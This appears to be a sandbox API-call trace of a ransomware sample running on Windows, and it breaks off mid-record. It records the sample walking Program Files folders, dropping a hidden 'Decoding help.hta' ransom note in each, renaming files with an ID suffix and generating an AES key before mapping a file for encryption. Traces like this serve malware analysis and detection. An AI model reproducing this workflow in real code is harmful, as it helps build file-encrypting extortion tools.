SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.241] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.241] lstrlenW (lpString="gadget.xml") returned 10 [0058.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.242] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0058.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" [0058.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" [0058.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.242] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.242] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.242] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.242] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.242] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0058.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js" [0058.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\*.*" [0058.242] GlobalMemoryStatus (in: lpBuffer=0x14f5fd10 | out: lpBuffer=0x14f5fd10) [0058.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25277dd8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa30 [0058.243] CloseHandle (hObject=0xa30) returned 1 [0058.243] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x20be, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0058.243] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.243] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0058.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" [0058.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.244] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.html") returned -1 [0058.244] lstrlenW (lpString="settings.html") returned 13 [0058.244] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.244] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0058.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" [0058.244] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" [0058.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.245] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="weather.html", cAlternateFileName="")) returned 1 [0058.245] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.245] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0058.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" [0058.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.245] lstrcmpiW (lpString1="Decoding help.hta", lpString2="weather.html") returned -1 [0058.245] lstrlenW (lpString="weather.html") returned 12 [0058.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*" [0058.245] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\*.*") returned 75 [0058.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\", lpString2="weather.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" [0058.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" [0058.245] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.245] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x14f5fd30 | out: lpFindFileData=0x14f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="weather.html", cAlternateFileName="")) returned 0 [0058.245] FindClose (in: hFindFile=0x6714f0 | out: hFindFile=0x6714f0) returned 1 Thread: id = 795 os_tid = 0x984 [0054.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*", lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671670 [0054.526] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.526] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.526] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.526] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.526] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb2b9400, ftCreationTime.dwHighDateTime=0x1c9c55a, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb2b9400, ftLastWriteTime.dwHighDateTime=0x1c9c55a, nFileSizeHigh=0x0, nFileSizeLow=0x1afd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SynchronizationEula.rtf", cAlternateFileName="SYNCHR~1.RTF")) returned 1 [0054.527] lstrcpyW (in: lpString1=0x97a23e0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*" [0054.527] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*") returned 92 [0054.527] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\Decoding help.hta" [0054.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\decoding help.hta")) returned 0xffffffff [0054.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbe0 [0058.405] WriteFile (in: hFile=0xbe0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x163dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x163dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.406] CloseHandle (hObject=0xbe0) returned 1 [0058.406] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.406] lstrcmpiW (lpString1="Decoding help.hta", lpString2="SynchronizationEula.rtf") returned -1 [0058.406] lstrlenW (lpString="SynchronizationEula.rtf") returned 23 [0058.406] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*" [0058.406] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*") returned 92 [0058.406] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\", lpString2="SynchronizationEula.rtf" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" [0058.406] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" [0058.406] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf.[ID]g9uZrLhJaygpwRm1[ID]" [0058.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\SynchronizationEula.rtf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\documentation\\1033\\license agreements\\synchronizationeula.rtf.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbe0 [0058.407] CreateFileMappingA (hFile=0xbe0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbe4 [0058.407] CryptAcquireContextA (in: phProv=0x163dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x163dfcec*=0x2aac5ef0) returned 1 [0060.212] CryptGenKey (in: hProv=0x2aac5ef0, Algid=0x6610, dwFlags=0x1, phKey=0x163dfce8 | out: phKey=0x163dfce8*=0x5fca660) returned 1 [0060.212] CryptExportKey (in: hKey=0x5fca660, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x163dfbe4, pdwDataLen=0x163dfce4 | out: pbData=0x163dfbe4*, pdwDataLen=0x163dfce4*=0x2c) returned 1 [0060.212] MapViewOfFile (hFileMappingObject=0xbe4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1afc0) returned 0x6970000 Thread: id = 796 os_tid = 0xa90 [0054.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*", lpFindFileData=0x183dfd30 | out: lpFindFileData=0x183dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b4a8 [0061.340] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.340] FindNextFileW (in: hFindFile=0x10a4b4a8, lpFindFileData=0x183dfd30 | out: lpFindFileData=0x183dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.340] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.340] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.340] FindNextFileW (in: hFindFile=0x10a4b4a8, lpFindFileData=0x183dfd30 | out: lpFindFileData=0x183dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x140f5c00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x140f5c00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x166d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAPYRUS.ELM", cAlternateFileName="")) returned 1 [0061.340] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*" [0061.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*") returned 71 [0061.340] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\Decoding help.hta" [0061.340] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\decoding help.hta")) returned 0xffffffff [0061.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.679] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x183dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x183dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.680] CloseHandle (hObject=0xe6c) returned 1 [0061.680] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 797 os_tid = 0xa18 [0054.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*.*", lpFindFileData=0x2224fd30 | out: lpFindFileData=0x2224fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, 